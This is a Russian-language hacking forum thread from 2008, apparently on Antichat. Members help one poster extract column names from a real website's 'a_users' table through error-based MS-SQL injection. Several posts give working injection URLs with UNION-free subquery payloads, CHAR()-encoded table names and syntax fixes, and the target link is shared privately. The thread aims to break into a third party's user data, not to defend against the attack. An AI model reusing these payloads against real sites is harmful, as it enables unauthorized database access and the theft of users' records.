Получение колонок через MS-SQL injection. |
06.10.2008, 00:19
|
|
Познающий
Регистрация: 15.09.2005
Сообщений: 60
С нами:
10869277
Репутация:
52
|
|
Получение колонок через MS-SQL injection.
Всем здрасте!=)
При банальном запросе вида:
http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+col umn_name+FROM+information_schema.columns+where+tab le_name='a_users')--
Получил ошибку, следующего содержания:
Код:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Joined tables cannot be specified in a query containing outer join operators. View or function 'information_schema.columns' contains joined tables.
/details.asp, line 59
Вопрос, реально ли в этой ситуации выдернуть имена столбцов, или придется перебирать? И если реально - то как это сделать? |
|
|
06.10.2008, 00:44
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
Код:
http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=CHAR(97,95,117,115,101,114,115))--
|
|
|
|
06.10.2008, 01:09
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от ~!DoK_tOR!~
Код:
http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=CHAR(97,95,117,115,101,114,115))--
Вот так делать не надо, будет ошибка :
The char function requires 1 arguments.
Если уж char , то вот так : char(97)%2Bchar(95)%2Bchar(117)%2Bchar(115)%2Bchar (101)%2Bchar(114)%2Bchar(115)
Но ИМХО дело не в этом, ошибка какая-то не та. Если не то, давай линк, а то гадания опять на три страницы будут 
|
|
|
|
06.10.2008, 01:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
колонки придется брутить, jokester inurl:details.asp?memberid=244247 только 1 линк)
Сообщение от ~!DoK_tOR!~
Код:
http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=CHAR(97,95,117,115,101,114,115))--
мда....... |
|
|
|
06.10.2008, 01:53
|
|
Познающий
Регистрация: 15.09.2005
Сообщений: 60
С нами:
10869277
Репутация:
52
|
|
jokester, l1ght - линк в ПМ.
А доктору и гисти по минусу бы поставить:-D
Последний раз редактировалось Dima-k17; 06.10.2008 в 01:56..
|
|
|
|
06.10.2008, 05:58
|
|
Познающий
Регистрация: 15.09.2005
Сообщений: 60
С нами:
10869277
Репутация:
52
|
|
Проблема решилась много проще=) все 97 столбцов оказались числовыми....
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
